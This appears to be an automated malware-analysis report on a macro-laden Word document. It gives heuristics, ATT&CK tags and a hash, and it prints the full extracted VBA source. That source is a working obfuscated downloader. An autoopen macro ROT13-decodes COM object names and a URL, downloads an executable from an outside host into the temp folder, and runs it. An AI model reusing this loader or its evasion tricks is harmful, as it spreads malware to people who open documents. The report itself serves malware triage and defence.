Verdict: MALICIOUS (Risk Score 250)
Malware Insights
MITRE ATT&CK
- T1059.005 Visual Basic
- T1140 Deobfuscate/Decode Files or Information
- T1204.002 Malicious File
The sample contains obfuscated VBA macros, including an auto-executing 'autoopen' macro. Critical heuristics indicate that the VBA code downloads and executes a file from an HTTP source. The script uses custom decoding functions and string manipulation, suggesting an attempt to hide its malicious intent. The primary IOC is the name of the macro file, 'macros.bas'.
Heuristics (8)

- VBA macros detected (medium; 5 related findings) [OLE_VBA_MACROS]: Document contains VBA macro code.
- VBA downloads and writes a file to disk (critical) [OLE_VBA_HTTP_DROP_EXEC]: VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.
  Matched line in script: `.Write kSrmQYLjBtNSgg.responseBody`
- Obfuscated auto-exec VBA loader (critical) [OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER]: Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  Matched line in script: `Set zFWcw = CreateObject(ZRCOUP(gS5U))`
- CreateObject call (high) [OLE_VBA_CREATEOBJ]: CreateObject call.
  Matched line in script: `Set zFWcw = CreateObject(ZRCOUP(gS5U))`
- VBA p-code auto-exec with execution tokens (high) [OLE_VBA_PCODE_AUTOEXEC_EXEC]: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- AutoOpen macro (low) [OLE_VBA_AUTOOPEN]: AutoOpen macro.
  Matched line in script: `Sub autoopen()`
- Legacy WordBasic auto-exec macro marker (medium) [OLE_LEGACY_WORDBASIC_AUTOEXEC]: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Suspicious extracted artifact (info) [EXTRACTED_FILE_STATIC_TRIAGE]: One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 12861 bytes |

SHA-256: 641624e4fffad5ce11f0034d8177e0ca6e58a0f52a8e13b15fd7da8704212317

Detection
- ClamAV: No threats found
- Obfuscation or payload: likely. 102 of 169 identifiers look randomly generated (e.g. 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'), consistent with name-mangling obfuscation.
Preview script (first 1,000 lines of the extracted script). The extraction flattened the source onto a few long lines; below it is broken at module, procedure and statement boundaries, with the padding loops that separate the real statements left on their own lines.

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Sub autoopen()
    ysrSwepCA
End Sub

Attribute VB_Name = "Module1"
Private Const LW4O3AUER = ""
Private Const QPFGLMSjq = LW4O3AUER
Private Const LRipI5OslYA = "abcdefghijklmnopqrstuvwxyz"
Private Const GLEqSmimQC = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"

' ROT13 decoder: rotates A-Z and a-z by 13 positions, leaves every other character unchanged
Function ZRCOUP(ByVal InString As String)
    Dim LetterU As String
    Dim LetterL As String
    Dim Letter As String
    Dim Rot13 As String
    Dim i As Integer
    LetterU = GLEqSmimQC
    LetterL = LRipI5OslYA
    i = 0
    Do While i <= Len(InString)
        i = i + 1
        Letter = Mid(InString, i, 1)
        If I0A7WvDveK(Letter) = True Then
            If cIRt4Ae(Letter) = True Then
                Rot13 = Rot13 & Mid(LetterU & LetterU, InStr(LetterU, Letter) + 13, 1)
            Else
                Rot13 = Rot13 & Mid(LetterL & LetterL, InStr(LetterL, Letter) + 13, 1)
            End If
        Else
            Rot13 = Rot13 + Letter
        End If
    Loop
    ZRCOUP = Rot13
End Function

' True when the (non-blank) character is upper case
Function cIRt4Ae(ByVal InString As String) As Boolean
    If StrComp(Trim(InString), "") = 0 Then
        cIRt4Ae = False
        Exit Function
    End If
    If StrComp(InString, UCase(InString)) = 0 Then
        cIRt4Ae = True
    Else
        cIRt4Ae = False
    End If
End Function

' True when the character is an ASCII letter
Function I0A7WvDveK(ByVal InString As String) As Boolean
    InString = UCase(InString)
    If InString = "" Then I0A7WvDveK = False: Exit Function
    If Asc(InString) >= 65 And Asc(InString) <= 90 Then
        I0A7WvDveK = True
    Else
        I0A7WvDveK = False
    End If
End Function

Attribute VB_Name = "Module11"
' ROT13-encoded ProgIDs, HTTP verb, file name and download URL; decoded at runtime by ZRCOUP
Private Const pIna0CSVNsu = "Furyy.Nccyvpngvba"
Private Const dvr5p = "NQBQO.Fgernz"
Private Const wvYm = "Fpevcgvat.SvyrFlfgrzBowrpg"
Private Const OJvaKHZFGT = "TRG"
Private Const dCkKHihXXc = "ZFKZY2.KZYUGGC"
Private Const WWNcjAI4U = "\qfUUU.rkr"
Private Const s8A4IFJCpDYh = "uggc://zjpbq4.pon.cy/wf/ova.rkr"
Private Const gS5U = wvYm

' Each "Dim X As Integer For X = N To N + 5 DoEvents Next X" run below is padding with no functional effect
Sub ysrSwepCA()
Dim zFWcw, gmkGo6q
Dim EfQhk As Integer For EfQhk = 655 To 655 + 5 DoEvents Next EfQhk Dim Gagod As Integer For Gagod = 2269 To 2269 + 5 DoEvents Next Gagod
Set zFWcw = CreateObject(ZRCOUP(gS5U))
Dim wCyKbc As Integer For wCyKbc = 654 To 654 + 5 DoEvents Next wCyKbc Dim EseFcbC As Integer For EseFcbC = 212 To 212 + 5 DoEvents Next EseFcbC
Dim ijnK2g, j_YLrCc1S, fz21trwt
Const rihuZ61esFi = 2
Dim iGZkZVPif As Integer For iGZkZVPif = 1004 To 1004 + 5 DoEvents Next iGZkZVPif Dim zuYaG As Integer For zuYaG = 813 To 813 + 5 DoEvents Next zuYaG Dim CmwCy As Integer For CmwCy = 2175 To 2175 + 5 DoEvents Next CmwCy Dim nrRsDxPMjeVRduJfSc As Integer For nrRsDxPMjeVRduJfSc = 971 To 971 + 5 DoEvents Next nrRsDxPMjeVRduJfSc Dim ocNpLYm As Integer For ocNpLYm = 2458 To 2458 + 5 DoEvents Next ocNpLYm Dim oqQdwEtZUU As Integer For oqQdwEtZUU = 2268 To 2268 + 5 DoEvents Next oqQdwEtZUU
Set ijnK2g = zFWcw.GetSpecialFolder(rihuZ61esFi)
Dim rRsDxPMEeVRdufSczuYaGag As Integer For rRsDxPMEeVRdufSczuYaGag = 1256 To 1256 + 5 DoEvents Next rRsDxPMEeVRdufSczuYaGag Dim cMuwQt As Integer For cMuwQt = 844 To 844 + 5 DoEvents Next cMuwQt Dim knfDhLrgArivFo As Integer For knfDhLrgArivFo = 372 To 372 + 5 DoEvents Next knfDhLrgArivFo
strLink = ZRCOUP(s8A4IFJCpDYh)
Dim paSaEf As Integer For paSaEf = 752 To 752 + 5 DoEvents Next paSaEf Dim UUTZJPYoONeT As Integer For UUTZJPYoONeT = 401 To 401 + 5 DoEvents Next UUTZJPYoONeT Dim JfSczuYa As Integer For JfSczuYa = 2237 To 2237 + 5 DoEvents Next JfSczuYa
strSaveTo = ijnK2g & ZRCOUP(WWNcjAI4U)
Dim PQBcNehkcAeI As Integer For PQBcNehkcAeI = 1085 To 1085 + 5 DoEvents Next PQBcNehkcAeI Dim ZwrUVCQckaF As Integer For ZwrUVCQckaF = 167 To 167 + 5 DoEvents Next ZwrUVCQckaF
Set kSrmQYLjBtNSgg = CreateObject(ZRCOUP(dCkKHihXXc))
Dim lQPQBc As Integer For lQPQBc = 1688 To 1688 + 5 DoEvents Next lQPQBc Dim UVCQcka As Integer For UVCQcka = 706 To 706 + 5 DoEvents Next UVCQcka Dim hkcAesodxnesCll As Integer For hkcAesodxnesCll = 1876 To 1876 + 5 DoEvents Next hkcAesodxnesCll
kSrmQYLjBtNSgg.Open ZRCOUP(OJvaKHZFGT), strLink, False
Dim boPjOnEfFQK As Integer For boPjOnEfFQK = 1815 To 1815 + 5 DoEvents Next boPjOnEfFQK Dim OarFbOZwrUV As Integer For OarFbOZwrUV = 673 To 673 + 5 DoEvents Next OarFbOZwrUV Dim ihlQPQ As Integer For ihlQPQ = 356 To 356 + 5 DoEvents Next ihlQPQ Dim CQckaFOONSpw As Integer For CQckaFOONSpw = 2478 To 2478 + 5 DoEvents Next CQckaFOONSpw
kSrmQYLjBtNSgg.send
Dim hYxaF As Integer For hYxaF = 2021 To 2021 + 5 DoEvents Next hYxaF Dim QoCYLUtoQS As Integer For QoCYLUtoQS = 1609 To 1609 + 5 DoEvents Next QoCYLUtoQS Dim aGkAgnGND As Integer For aGkAgnGND = 2150 To 2150 + 5 DoEvents Next aGkAgnGND Dim AfsrHKNF As Integer For AfsrHKNF = 1200 To 1200 + 5 DoEvents Next AfsrHKNF Dim DjefdiTMTyZ As Integer For DjefdiTMTyZ = 124 To 124 + 5 DoEvents Next DjefdiTMTyZ Dim UtoQSzTZhQ As Integer For UtoQSzTZhQ = 1642 To 1642 + 5 DoEvents Next UtoQSzTZhQ
Set hxuWnpbqBtp4u = CreateObject(ZRCOUP(gS5U))
Dim RgNfQUujgspLiG As Integer For RgNfQUujgspLiG = 819 To 819 + 5 DoEvents Next RgNfQUujgspLiG Dim pxnSNOMRCJQh As Integer For pxnSNOMRCJQh = 881 To 881 + 5 DoEvents Next pxnSNOMRCJQh Dim hahKYQnr As Integer For hahKYQnr = 1218 To 1218 + 5 DoEvents Next hahKYQnr Dim GAegMS As Integer For GAegMS = 646 To 646 + 5 DoEvents Next GAegMS Dim rfdQpmIfDJF As Integer For rfdQpmIfDJF = 238 To 238 + 5 DoEvents Next rfdQpmIfDJF Dim gyYyJDVFcL As Integer For gyYyJDVFcL = 2008 To 2008 + 5 DoEvents Next gyYyJDVFcL
If hxuWnpbqBtp4u.FileExists(strSaveTo) Then
Dim BOdJc As Integer For BOdJc = 899 To 899 + 5 DoEvents Next BOdJc Dim GNeFEUKMEGljQF As Integer For GNeFEUKMEGljQF = 741 To 741 + 5 DoEvents Next GNeFEUKMEGljQF Dim HitnFC As Integer For HitnFC = 1820 To 1820 + 5 DoEvents Next HitnFC Dim yyaiuQqVtL As Integer For yyaiuQqVtL = 794 To 794 + 5 DoEvents Next yyaiuQqVtL Dim zJesfR As Integer For zJesfR = 381 To 381 + 5 DoEvents Next zJesfR Dim gNCQNE As Integer For gNCQNE = 728 To 728 + 5 DoEvents Next gNCQNE Dim qiHQOzhEglzJe As Integer For qiHQOzhEglzJe = 854 To 854 + 5 DoEvents Next qiHQOzhEglzJe
hxuWnpbqBtp4u.DeleteFile (strSaveTo)
Dim tLYLJDVSpZkp As Integer For tLYLJDVSpZkp = 1204 To 1204 + 5 DoEvents Next tLYLJDVSpZkp Dim NetOCLjeH As Integer For NetOCLjeH = 115 To 115 + 5 DoEvents Next NetOCLjeH Dim ROmVgmiuK As Integer For ROmVgmiuK = 148 To 148 + 5 DoEvents Next ROmVgmiuK Dim pNFBNetOCLj As Integer For pNFBNetOCLj = 1791 To 1791 + 5 DoEvents Next pNFBNetOCLj Dim IUIFzRO As Integer For IUIFzRO = 684 To 684 + 5 DoEvents Next IUIFzRO Dim vGbocN As Integer For vGbocN = 1317 To 1317 + 5 DoEvents Next vGbocN Dim HHvvVfrTnSqIIFzROmVgmiuK As Integer For HHvvVfrTnSqIIFzROmVgmiuK = 148 To 148 + 5 DoEvents Next HHvvVfrTnSqIIFzROmVgmiuK Dim qLzIh As Integer For qLzIh = 140 To 140 + 5 DoEvents Next qLzIh
End If
Dim OCAuMJgPb As Integer For OCAuMJgPb = 158 To 158 + 5 DoEvents Next OCAuMJgPb Dim jFEhNgRVvV As Integer For jFEhNgRVvV = 758 To 758 + 5 DoEvents Next jFEhNgRVvV Dim ZlNhMkCOCAu As Integer For ZlNhMkCOCAu = 1582 To 1582 + 5 DoEvents Next ZlNhMkCOCAu Dim MjHzvHY As Integer For MjHzvHY = 1424 To 1424 + 5 DoEvents Next MjHzvHY Dim COCAuM As Integer For COCAuM = 1138 To 1138 + 5 DoEvents Next COCAuM Dim gEwsEUkFtC As Integer For gEwsEUkFtC = 872 To 872 + 5 DoEvents Next gEwsEUkFtC Dim hzLzxrIGdM As Integer For hzLzxrIGdM = 1855 To 1855 + 5 DoEvents Next hzLzxrIGdM
Dim Antkhrp9gTyfJ3
Dim eVvKC As Integer For eVvKC = 303 To 303 + 5 DoEvents Next eVvKC Dim qlOQxDQfUAv As Integer For qlOQxDQfUAv = 2486 To 2486 + 5 DoEvents Next qlOQxDQfUAv Dim aQtOotqBET As Integer For aQtOotqBET = 809 To 809 + 5 DoEvents Next aQtOotqBET Dim tBOqKpNfFgr As Integer For tBOqKpNfFgr = 735 To 735 + 5 DoEvents Next tBOqKpNfFgr Dim DYOFSdLLzlM As Integer For DYOFSdLLzlM = 1713 To 1713 + 5 DoEvents Next DYOFSdLLzlM Dim OqKpNfFgr As Integer For OqKpNfFgr = 735 To 735 + 5 DoEvents Next OqKpNfFgr
Set Antkhrp9gTyfJ3 = CreateObject(ZRCOUP(dvr5p))
Dim JDVTqLkqmyB As Integer For JDVTqLkqmyB = 542 To 542 + 5 DoEvents Next JDVTqLkqmyB Dim ejwtcpOOq As Integer For ejwtcpOOq = 657 To 657 + 5 DoEvents Next ejwtcpOOq Dim EIunuZzlA As Integer For EIunuZzlA = 2396 To 2396 + 5 DoEvents Next EIunuZzlA Dim stauzHxdmml As Integer For stauzHxdmml = 753 To 753 + 5 DoEvents Next stauzHxdmml Dim peJFFE As Integer For peJFFE = 245 To 245 + 5 DoEvents Next peJFFE
With Antkhrp9gTyfJ3
Dim nJQYCP As Integer For nJQYCP = 453 To 453 + 5 DoEvents Next nJQYCP Dim bstOPaxeHYD As Integer For bstOPaxeHYD = 1531 To 1531 + 5 DoEvents Next bstOPaxeHYD Dim AVumj As Integer For AVumj = 1877 To 1877 + 5 DoEvents Next AVumj
.Type = 1
Dim YpBpnhzwS As Integer For YpBpnhzwS = 738 To 738 + 5 DoEvents Next YpBpnhzwS Dim LakESFsSpo As Integer For LakESFsSpo = 249 To 249 + 5 DoEvents Next LakESFsSpo Dim ijhmQel As Integer For ijhmQel = 1328 To 1328 + 5 DoEvents Next ijhmQel Dim Cbhdor As Integer For Cbhdor = 851 To 851 + 5 DoEvents Next Cbhdor Dim YcqnVjII As Integer For YcqnVjII = 536 To 536 + 5 DoEvents Next YcqnVjII
.Open
Dim rVGBqKBsFQz As Integer For rVGBqKBsFQz = 2453 To 2453 + 5 DoEvents Next rVGBqKBsFQz Dim kQlqyn As Integer For kQlqyn = 1851 To 1851 + 5 DoEvents Next kQlqyn Dim RuNtQjvjh As Integer For RuNtQjvjh = 1217 To 1217 + 5 DoEvents Next RuNtQjvjh Dim pPmlNuLyC As Integer For pPmlNuLyC = 1123 To 1123 + 5 DoEvents Next pPmlNuLyC Dim lbeVuYCAiQri As Integer For lbeVuYCAiQri = 1870 To 1870 + 5 DoEvents Next lbeVuYCAiQri
.Write kSrmQYLjBtNSgg.responseBody
Dim HMxqxcpoEI As Integer For HMxqxcpoEI = 1427 To 1427 + 5 DoEvents Next HMxqxcpoEI Dim VtdntpB As Integer For VtdntpB = 793 To 793 + 5 DoEvents Next VtdntpB Dim HlPzvk As Integer For HlPzvk = 2141 To 2141 + 5 DoEvents Next HlPzvk Dim DyceJ As Integer For DyceJ = 2267 To 2267 + 5 DoEvents Next DyceJ Dim mjGqAGCOfgBD As Integer For mjGqAGCOfgBD = 813 To 813 + 5 DoEvents Next mjGqAGCOfgBD
.SaveToFile strSaveTo
Dim evJfSdAvZaG As Integer For evJfSdAvZaG = 703 To 703 + 5 DoEvents Next evJfSdAvZaG Dim CmxDzK As Integer For CmxDzK = 420 To 420 + 5 DoEvents Next CmxDzK
.Close
Dim fGdbDlC As Integer For fGdbDlC = 735 To 735 + 5 DoEvents Next fGdbDlC Dim gqZZLLnvIkE As Integer For gqZZLLnvIkE = 2286 To 2286 + 5 DoEvents Next gqZZLLnvIkE Dim CpcDZYA As Integer For CpcDZYA = 1038 To 1038 + 5 DoEvents Next CpcDZYA Dim iYOdnVVIIks As Integer For iYOdnVVIIks = 469 To 469 + 5 DoEvents Next iYOdnVVIIks
End With
Dim vypOeQG As Integer For vypOeQG = 1594 To 1594 + 5 DoEvents Next vypOeQG Dim KRiIIYOQI As Integer For KRiIIYOQI = 328 To 328 + 5 DoEvents Next KRiIIYOQI
Set Antkhrp9gTyfJ3 = Nothing
Dim Ocbrvy As Integer For Ocbrvy = 1089 To 1089 + 5 DoEvents Next Ocbrvy Dim ZlBQY As Integer For ZlBQY = 505 To 505 + 5 DoEvents Next ZlBQY Dim VvYCn As Integer For VvYCn = 2276 To 2276 + 5 DoEvents Next VvYCn Dim xRuzMJsF As Integer For xRuzMJsF = 1019 To 1019 + 5 DoEvents Next xRuzMJsF Dim SQVHAHmMyNR As Integer For SQVHAHmMyNR = 1162 To 1162 + 5 DoEvents Next SQVHAHmMyNR
If hxuWnpbqBtp4u.FileExists(strSaveTo) Then
Dim ahoSgfvyB As Integer For ahoSgfvyB = 88 To 88 + 5 DoEvents Next ahoSgfvyB Dim QSSQVHA As Integer For QSSQVHA = 1541 To 1541 + 5 DoEvents Next QSSQVHA Dim qOeQGorL As Integer For qOeQGorL = 929 To 929 + 5 DoEvents Next qOeQGorL Dim RIiKpaVJfUL As Integer For RIiKpaVJfUL = 1181 To 1181 + 5 DoEvents Next RIiKpaVJfUL Dim vmLbTDl As Integer For vmLbTDl = 660 To 660 + 5 DoEvents Next vmLbTDl
End If
Dim AfFrHLNF As Integer For AfFrHLNF = 1199 To 1199 + 5 DoEvents Next AfFrHLNF Dim mLbTDloI As Integer For mLbTDloI = 1865 To 1865 + 5 DoEvents Next mLbTDloI Dim oEHKCbEjT As Integer For oEHKCbEjT = 393 To 393 + 5 DoEvents Next oEHKCbEjT Dim wftRStCOr As Integer For wftRStCOr = 1281 To 1281 + 5 DoEvents Next wftRStCOr Dim oFrvVJGASP As Integer For oFrvVJGASP = 509 To 509 + 5 DoEvents Next oFrvVJGASP Dim tcpOOqyL As Integer For tcpOOqyL = 1109 To 1109 + 5 DoEvents Next tcpOOqyL Dim AULCPaIIwi As Integer For AULCPaIIwi = 634 To 634 + 5 DoEvents Next AULCPaIIwi
Set ыААыва = CreateObject(ZRCOUP(pIna0CSVNsu))
Dim dBQJtc As Integer For dBQJtc = 969 To 969 + 5 DoEvents Next dBQJtc Dim rkrVwixBEw As Integer For rkrVwixBEw = 1508 To 1508 + 5 DoEvents Next rkrVwixBEw
ыААыва.Open ijnK2g & ZRCOUP(WWNcjAI4U)
Dim QsgpNHlnTo As Integer For QsgpNHlnTo = 2223 To 2223 + 5 DoEvents Next QsgpNHlnTo Dim MYpqLMQubET As Integer For MYpqLMQubET = 1368 To 1368 + 5 DoEvents Next MYpqLMQubET
End Sub
```